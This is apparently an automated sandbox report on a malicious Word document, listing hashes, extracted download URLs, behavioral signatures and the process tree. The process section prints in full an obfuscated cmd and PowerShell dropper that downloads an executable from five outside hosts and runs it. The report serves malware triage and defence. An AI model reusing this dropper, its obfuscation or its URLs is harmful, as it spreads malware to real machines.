Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
17-06-2024 19:41
Static task
static1
Behavioral task
behavioral1
Sample
b9b0bfe962149e50c52b24cec1275534_JaffaCakes118.doc
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
b9b0bfe962149e50c52b24cec1275534_JaffaCakes118.doc
Resource
win10v2004-20240226-en
General
-
Target
b9b0bfe962149e50c52b24cec1275534_JaffaCakes118.doc
-
Size
217KB
-
MD5
b9b0bfe962149e50c52b24cec1275534
-
SHA1
c7b3026099820fd57e7ca7c74944ac22d39e4054
-
SHA256
c95d7e6efb2ec61100dba574e1a359927e9726efdad76b4c809b93ef12a06f73
-
SHA512
702a55479507ef63758ee61b132e0cb913188913cf2bbdba20c41fdd967412ec54de83de4983540a9d7a2e58990d73d2496a4a5eac5e0fbc9b5943ec32f11a6b
-
SSDEEP
3072:SinJXfT7nasKiNKDzaJFUKc0UTE7yZRUV7RJeOzi80:5JXr7nbpEDzYUTE7yZRVUi80
Malware Config
Extracted
http://mimiabner.com/22D_ZGrV5aY_AvvRf
http://nt-group.kz/86Rzn_wmF7RyQ7F
http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ
http://tasmatbaa.com/1MXeJC9_KSsQ7B
http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2848 372 cmd.exe 90 -
Blocklisted process makes network request 2 IoCs
flow pid Process 24 4452 powershell.exe 28 4452 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 372 WINWORD.EXE 372 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4452 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 372 WINWORD.EXE 372 WINWORD.EXE 372 WINWORD.EXE 372 WINWORD.EXE 372 WINWORD.EXE 372 WINWORD.EXE 372 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 372 wrote to memory of 2848 372 WINWORD.EXE 95 PID 372 wrote to memory of 2848 372 WINWORD.EXE 95 PID 2848 wrote to memory of 4452 2848 cmd.exe 97 PID 2848 wrote to memory of 4452 2848 cmd.exe 97
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b9b0bfe962149e50c52b24cec1275534_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Berkshirej45='Crescentt4';$CreditCardAccounti50=new-object Net.WebClient;$Granitez64='http://mimiabner.com/22D_ZGrV5aY_AvvRf@http://nt-group.kz/86Rzn_wmF7RyQ7F@http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ@http://tasmatbaa.com/1MXeJC9_KSsQ7B@http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6'.Split('@');$Granitez70='Trafficwaywb73';$Cambridgeshireik76 = '204';$Ridgesj14='Implementedph58';$Officerkc37=$env:public+'\'+$Cambridgeshireik76+'.exe';foreach($JBODfj17 in $Granitez64){try{$CreditCardAccounti50.DownloadFile($JBODfj17, $Officerkc37);$CreditCardAccountmq39='ShoesShoesd41';If ((Get-Item $Officerkc37).length -ge 80000) {Invoke-Item $Officerkc37;$FTPbj82='Portjf32';break;}}catch{}}$calculatejh80='Valleysik6';2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $Berkshirej45='Crescentt4';$CreditCardAccounti50=new-object Net.WebClient;$Granitez64='http://mimiabner.com/22D_ZGrV5aY_AvvRf@http://nt-group.kz/86Rzn_wmF7RyQ7F@http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ@http://tasmatbaa.com/1MXeJC9_KSsQ7B@http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6'.Split('@');$Granitez70='Trafficwaywb73';$Cambridgeshireik76 = '204';$Ridgesj14='Implementedph58';$Officerkc37=$env:public+'\'+$Cambridgeshireik76+'.exe';foreach($JBODfj17 in $Granitez64){try{$CreditCardAccounti50.DownloadFile($JBODfj17, $Officerkc37);$CreditCardAccountmq39='ShoesShoesd41';If ((Get-Item $Officerkc37).length -ge 80000) {Invoke-Item $Officerkc37;$FTPbj82='Portjf32';break;}}catch{}}$calculatejh80='Valleysik6';3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3704 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:81⤵PID:2616
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82